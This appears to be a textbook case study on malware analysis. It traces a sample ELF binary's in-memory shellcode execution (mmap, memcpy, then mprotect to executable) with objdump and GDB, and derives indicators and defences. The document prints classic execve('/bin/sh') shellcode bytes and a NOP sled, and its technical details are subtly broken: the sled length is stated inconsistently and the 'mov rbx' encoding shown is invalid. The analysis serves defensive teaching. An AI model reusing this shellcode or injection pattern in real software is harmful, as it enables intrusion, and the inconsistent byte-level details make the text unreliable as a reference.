Case Study 34-2: Malware Analysis — Identifying Shellcode in a Binary

Introduction

Malware analysis is one of the most important applications of reverse engineering. Security analysts analyze malicious binaries to understand their behavior, extract indicators of compromise (IOCs), and develop defenses. This case study examines a sample binary with characteristics drawn from historical malware patterns — specifically, a binary that appears legitimate but contains embedded shellcode and process injection indicators.

🔐 Security Note: This analysis is based on patterns from documented, historical malware behaviors. The techniques described are used by malware analysts at security companies, national CERTs, and incident response teams to understand and defend against threats. No functional attack tools are described or provided. Understanding how these techniques work is essential for defending against them.

The Sample Binary

Our sample, sample.elf, presents itself as a benign utility but contains suspicious code patterns. The goal is to identify the malicious components through static and dynamic analysis.

$ file sample.elf
sample.elf: ELF 64-bit LSB executable, x86-64, dynamically linked, stripped

$ ls -la sample.elf
-rwxr-xr-x 1 analyst analyst 18432 Mar 15 14:22 sample.elf

$ md5sum sample.elf
a1b2c3d4e5f6789012345678abcdef01  sample.elf

Phase 1: Static Triage

Initial string analysis:

$ strings -n 6 sample.elf | sort
/bin/bash
/proc/self/maps
/tmp/.cache
GET / HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0
connect
mmap
mprotect
munmap
open
read
socket
write

Red flags immediately: - /proc/self/maps — reading its own memory map (suspicious for a "utility") - /tmp/.cache — writing to a hidden temp file - mmap, mprotect, munmap — memory allocation with permission changes (shellcode injection pattern) - Network-related strings alongside /proc/self/maps

$ objdump -T sample.elf
DYNAMIC SYMBOL TABLE:
mmap64
mprotect
munmap
socket
connect
send
recv
open
read
write
exit

The combination of mmap/mprotect with network functions (socket, connect, send, recv) is a classic dropper or implant pattern: download shellcode, allocate executable memory, copy and execute.

Phase 2: Identifying the Suspicious Function

Disassemble and look for the mmap call chain:

$ objdump -M intel -d sample.elf | grep -A3 -B3 "call.*mmap"
  401580: bf 00 00 00 00    mov    edi, 0x0          ; addr = NULL
  401585: be 00 10 00 00    mov    esi, 0x1000       ; length = 4096
  40158a: ba 03 00 00 00    mov    edx, 0x3          ; prot = PROT_READ|PROT_WRITE
  40158f: 41 ba 22 00 00 00 mov    r10d, 0x22        ; flags = MAP_PRIVATE|MAP_ANONYMOUS
  401595: 45 31 c0          xor    r8d, r8d          ; fd = -1? No, 0 here
  401598: 45 31 c9          xor    r9d, r9d          ; offset = 0
  40159b: e8 xx xx xx xx    call   mmap64@plt
  4015a0: 48 89 45 f8       mov    [rbp-0x8], rax    ; save mapped address

  ; ... copy code to mapped region ...
  ; ... then:

  4015c8: 48 8b 7d f8       mov    rdi, [rbp-0x8]   ; address
  4015cc: be 00 10 00 00    mov    esi, 0x1000       ; length
  4015d1: ba 05 00 00 00    mov    edx, 0x5          ; prot = PROT_READ|PROT_EXEC !!!
  4015d6: e8 xx xx xx xx    call   mprotect@plt      ; make it executable

The PROT_READ|PROT_EXEC (0x5) call to mprotect after allocating MAP_ANONYMOUS memory is a defining shellcode injection indicator. The pattern: 1. mmap(NULL, size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) — allocate writable memory 2. Copy code into it 3. mprotect(addr, size, PROT_READ|PROT_EXEC) — make it executable 4. Call or jump to the new memory

This is the standard pattern for executing shellcode in memory without writing to disk (fileless execution).

Phase 3: Analyzing the Shellcode

Find the data being copied. Following the code between mmap and mprotect:

  4015a5: 48 8b 45 f8       mov    rax, [rbp-0x8]   ; mapped memory
  4015a9: 48 89 45 f0       mov    [rbp-0x10], rax   ; save dst
  4015ad: 48 8d 35 4c 0a 00 00  lea    rsi, [rip+0xa4c]  ; source data (in .data)
  4015b4: 48 8b 7d f0       mov    rdi, [rbp-0x10]   ; dst
  4015b8: ba 48 00 00 00    mov    edx, 0x48         ; 72 bytes
  4015bd: e8 xx xx xx xx    call   memcpy@plt

The shellcode is 72 bytes located in the .data section at RIP+0xa4c. Let's examine it:

$ objdump -M intel -s -j .data sample.elf
Contents of section .data:
 402060 90909090 90909090 90909090 90909090  ................   ; NOP sled
 402070 90909090 90909090 90909090 90909090  ................
 402080 90909090 90909090 90909090 90909090  ................
 402090 48 31 d2 48 bb 2f 2f 62 69 6e 2f    H1.H.//bin/
 40209b 73 68 00 53 48 89 e7 48 31 c0 b0    sh.SH..H1...
 4020a6 3b 0f 05                             ;..

This is recognizable shellcode structure: - 90909090... — NOP sled (16 bytes of NOPs before the actual code) - 48 31 d2xor rdx, rdx - 48 bb 2f 2f 62 69 6e 2f 73 68 00mov rbx, 0x0068732f6e69622f2f (the string //bin/sh\0 packed as a 64-bit integer) - 53push rbx - 48 89 e7mov rdi, rsp (point rdi to the string on the stack) - 48 31 c0xor rax, rax - b0 3bmov al, 59 (syscall number 59 = execve) - 0f 05syscall

This is a classic x86-64 execve("/bin/sh", NULL, NULL) shellcode — the minimal sequence to spawn a shell. The NOP sled at the front is a historical reliability technique (Chapter 35).

Phase 4: The NOP Sled

A NOP sled (\x90\x90\x90...) is a sequence of no-operation instructions placed before shellcode. Its purpose: if execution lands anywhere in the sled, it slides down to the actual shellcode below. This was important for stack-based exploits before ASLR made addresses unpredictable.

Seeing a NOP sled in modern code suggests: - Code written to be compatible with older exploitation techniques - Repurposed code from an earlier era - Deliberate imitation of old shellcode to evade signature-based detection

In this sample, the NOP sled is 48 bytes — unusually long, suggesting it was written to accommodate imprecise landing.

Phase 5: Dynamic Confirmation with GDB

Confirm the analysis by catching the mprotect call:

$ gdb -q sample.elf
(gdb) catch syscall mprotect
Catchpoint 1 (syscall 'mprotect')
(gdb) run

Catchpoint 1 (call to syscall mprotect), 0x00007f... in mprotect ()
(gdb) info registers rdi rsi rdx
rdi  0x7f...a000     ; address of mapped region
rsi  0x1000          ; size 4096
rdx  0x5             ; PROT_READ|PROT_EXEC ← confirmed

(gdb) x/20xb 0x7f...a000
0x7f...a000: 90 90 90 90 90 90 90 90  ; NOP sled
0x7f...a008: 90 90 90 90 90 90 90 90
0x7f...a010: ...

(gdb) # Now set a breakpoint just after mprotect to catch the call/jmp to shellcode
(gdb) finish   ; return from mprotect
(gdb) stepi    ; step through to the indirect call

The analysis confirms: memory allocated, shellcode copied, permissions changed to executable. The shellcode will execute next.

Phase 6: Indicators of Compromise

From this analysis, we can extract IOCs: - MD5 hash of the binary - The shellcode bytes (for signature detection): 48 31 d2 48 bb 2f 2f 62 69 6e 2f 73 68 00 53 48 89 e7 48 31 c0 b0 3b 0f 05 - The NOP sled signature: 16+ consecutive 0x90 bytes - The behavioral pattern: mmapmemcpymprotect(PROT_EXEC) → indirect call

Defensive Implications

Understanding this attack pattern motivates several defenses:

  1. W^X (Write XOR Execute): Memory pages should never be simultaneously writable and executable. Setting PROT_READ|PROT_WRITE|PROT_EXEC is disallowed by modern kernels when compiled with appropriate flags. This sample used separate mmap (RW) and mprotect (RX) calls to work around this.

  2. seccomp-bpf: Restricting the system calls available to a process. If mprotect with PROT_EXEC was blocked, this technique would fail. Many sandboxes implement this.

  3. Integrity Monitoring: Detecting when executable memory is created at runtime (not from a mapped file). Tools like Falco or auditd can alert on mprotect calls that add PROT_EXEC.

  4. Memory Scanning: Scanning for NOP sled signatures in process memory is a detection technique used by some EDR products.

  5. Code Signing / Executable Whitelisting: Preventing execution of code not from signed files. mmap-and-execute bypasses this in older implementations; newer implementations (like Apple's Hardened Runtime) explicitly block JIT without entitlement.

Lessons for Defenders

This analysis demonstrates what a malware analyst does in practice: identify the high-level behavior from strings and imports, trace the suspicious code paths in the disassembly, confirm the behavior in GDB, and extract actionable IOCs. No single technique is sufficient — the combination of string analysis, dynamic import inspection, disassembly, and dynamic tracing gives a complete picture.

Understanding shellcode at the assembly level is what allows analysts to recognize it in compressed, obfuscated, or network-transmitted form. The execve syscall sequence is identifiable regardless of how the surrounding code is structured.